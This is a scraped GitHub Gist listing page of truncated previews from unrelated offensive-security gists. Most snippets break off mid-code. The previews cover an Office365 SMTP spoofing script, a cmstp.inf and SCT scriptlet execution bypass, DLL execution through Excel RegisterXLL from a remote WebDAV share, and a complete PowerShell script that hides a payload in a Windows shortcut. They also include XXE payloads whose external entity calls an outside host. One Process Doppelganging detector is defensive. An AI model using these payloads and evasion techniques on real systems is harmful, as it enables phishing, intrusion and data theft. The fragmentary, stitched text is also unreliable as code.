Skip to content

Instantly share code, notes, and snippets.

#!/usr/bin/python3
import re
import zipfile
import argparse
from urllib.parse import urlparse
from colorama import Fore
from colorama import Style
from colorama import init
@ustayready
ustayready / spoof.py
Created April 13, 2022 13:22
Simple unfinished SMTP spoof script for use with Office365 DirectSend SmartHosts
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import ssl
import email
import argparse
@jakobhuss
jakobhuss / resolvers.sh
Last active March 15, 2022 06:29
Basic script for finding a list of dns resolvers that are "good". Usage is resolvers.sh or resolvers.sh domain-name.com
#!/usr/bin/bash
if [ $# -eq 0 ]; then
test_domain=example.com
else
test_domain=$1
fi
function rand(){
cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 32 | head -n 1
$exepath = "c:\windows"
$searchstrings = @("/url", "/uri", "/wildcard", "/format", "/path")
$skip = @("logoff.exe", "mcrmgr.exe", "audit.exe")
$foundin = @()
$testedbins = @()
Function Execute-Command ($commandPath, $commandArguments)
{
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = $commandPath
;cmstp.exe /s cmstp.inf
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
function Get-Doppelgangers
{
<#
.SYNOPSIS
Detects use of NTFS transactions for stealth/evasion, aka 'Process Doppelganging'
Author: Joe Desimone (@dez_)
License: BSD 3-Clause
<?xml version="1.0" encoding="utf-8"?>
<package>
<component
id="dummy">
<registration
description="dummy"
progid="dummy"
version="1.00"
remotable="True">
<script
@ryhanson
ryhanson / ExcelXLL.md
Last active November 8, 2024 14:51
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@3gstudent
3gstudent / shortcut.ps1
Created December 30, 2016 03:10
Hide payload into Windows shortcut
$file = Get-Content "c:\test\test.txt"
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("c:\test\test.lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"
$Shortcut.Arguments = ' '+ $file
$Shortcut.Save()
@staaldraad
staaldraad / XXE_payloads
Last active October 8, 2024 15:20
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>